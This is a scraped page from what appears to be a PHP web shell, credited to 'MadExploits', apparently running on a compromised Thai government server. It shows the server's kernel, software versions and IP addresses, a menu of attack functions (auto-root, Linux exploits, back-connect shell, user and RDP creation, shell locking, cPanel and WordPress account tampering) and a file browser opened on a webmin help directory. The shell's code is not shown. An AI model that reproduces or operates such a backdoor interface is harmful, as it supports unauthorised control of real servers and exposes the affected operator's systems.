Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
syslog-ng /
help /
[ HOME SHELL ]
Name
Size
Permission
Action
destinations.ca.UTF-8.html
1
KB
-rw-r--r--
destinations.ca.html
1010
B
-rw-r--r--
destinations.html
934
B
-rw-r--r--
destinations.nl.UTF-8.html
1.12
KB
-rw-r--r--
destinations.nl.html
1.12
KB
-rw-r--r--
filters.ca.UTF-8.html
1.21
KB
-rw-r--r--
filters.ca.html
1.2
KB
-rw-r--r--
filters.html
1.1
KB
-rw-r--r--
filters.nl.UTF-8.html
1.32
KB
-rw-r--r--
filters.nl.html
1.32
KB
-rw-r--r--
intro.ca.UTF-8.html
1.58
KB
-rw-r--r--
intro.ca.html
1.56
KB
-rw-r--r--
intro.html
1.41
KB
-rw-r--r--
intro.nl.UTF-8.html
1.63
KB
-rw-r--r--
intro.nl.html
1.63
KB
-rw-r--r--
logs.ca.UTF-8.html
883
B
-rw-r--r--
logs.ca.html
868
B
-rw-r--r--
logs.html
769
B
-rw-r--r--
logs.nl.UTF-8.html
905
B
-rw-r--r--
logs.nl.html
905
B
-rw-r--r--
options.ca.UTF-8.html
458
B
-rw-r--r--
options.ca.html
453
B
-rw-r--r--
options.html
380
B
-rw-r--r--
options.nl.UTF-8.html
481
B
-rw-r--r--
options.nl.html
481
B
-rw-r--r--
sources.ca.UTF-8.html
753
B
-rw-r--r--
sources.ca.html
742
B
-rw-r--r--
sources.html
688
B
-rw-r--r--
sources.nl.UTF-8.html
823
B
-rw-r--r--
sources.nl.html
823
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filters.html
<header>Log Filters</header> A log filter defines a set of conditions that may match a log message, based on its facility, priority, contents, sender's hostname and source IP address. A filter does nothing on its own - however, when combined with a source and destination in a log target, it controls which messages are written to the destination. <p> This page lists all existing filters, and can be used to create new ones, or edit and delete those that already exist. You should be careful when removing or changing those that were setup by default, as they often select critical log messages or are important to the functioning of the system. However, it is quite safe to add your own filters. <p> Syslog-NG allows filters to be extemely complex and make use of boolean logic to match messages. When editing a filter, you can select to use a simple set of rules for choosing which of the facility, priority, contents, hostname and IP the filter matches on. Or you can choose to enter a Syslog-NG boolean expression directly, which should only be used if you are familiar with its configuration file format. <p> <footer>
Close